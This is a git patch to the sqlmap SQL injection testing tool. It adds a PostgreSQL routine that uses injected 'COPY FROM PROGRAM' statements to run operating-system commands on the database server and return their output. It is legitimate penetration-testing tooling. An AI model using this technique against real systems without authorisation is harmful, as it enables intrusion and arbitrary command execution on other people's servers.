From ef5cb9a4606b863b5dd2ac5bf45472c877256943 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 21 Mar 2019 13:57:17 +0100
Subject: [PATCH] In preparation for #3545

---
 lib/core/settings.py                |  2 +-
 plugins/dbms/postgresql/takeover.py | 12 ++++++++++++
 txt/checksum.md5                    |  4 ++--
 3 files changed, 15 insertions(+), 3 deletions(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index fb02d01cf..384b7c943 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.3.3.39"
+VERSION = "1.3.3.40"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index 13edbbce1..3af69331a 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -102,3 +102,15 @@ class Takeover(GenericTakeover):
         self.createSupportTbl(self.fileTblName, self.tblField, "text")
         inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
         self.cleanup(onlyFileTbl=True)
+
+    def copyExecCmd(self, cmd):
+        # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+        self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
+        self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
+        self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
+        inject.goStacked(self._forgedCmd)
+
+        query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
+        output = inject.getValue(query, resumeValue=False)
+
+        return output
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index c83b704f9..df76c6faa 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,7 +50,7 @@ d5ef43fe3cdd6c2602d7db45651f9ceb  lib/core/readlineng.py
 7d8a22c582ad201f65b73225e4456170  lib/core/replication.py
 3179d34f371e0295dd4604568fb30bcd  lib/core/revision.py
 d6269c55789f78cf707e09a0f5b45443  lib/core/session.py
-e785996e0f9edd8e309094048dc40d05  lib/core/settings.py
+068159b771eef31a3852da30eba31ccd  lib/core/settings.py
 4483b4a5b601d8f1c4281071dff21ecc  lib/core/shell.py
 10fd19b0716ed261e6d04f311f6f527c  lib/core/subprocessng.py
 10d7e4f7ba2502cce5cf69223c52eddc  lib/core/target.py
@@ -199,7 +199,7 @@ d68b5a9d6e608f15fbe2c520613ece4a  plugins/dbms/postgresql/filesystem.py
 a2ac0498d89797041bf65e4990cf8430  plugins/dbms/postgresql/fingerprint.py
 fb018fd23dcebdb36dddd22ac92efa2c  plugins/dbms/postgresql/__init__.py
 290ea28e1215565d9d12ede3422a4dcf  plugins/dbms/postgresql/syntax.py
-339bc65824b5c946ec40a12cd0257df1  plugins/dbms/postgresql/takeover.py
+cee109ef785cd1ebbc1df5311246094d  plugins/dbms/postgresql/takeover.py
 014968f7b28abe3ca8e533843a017453  plugins/dbms/sqlite/connector.py
 6a0784e3ce46b6aa23dde813c6bc177f  plugins/dbms/sqlite/enumeration.py
 3c0adec05071fbe655a9c2c7afe52721  plugins/dbms/sqlite/filesystem.py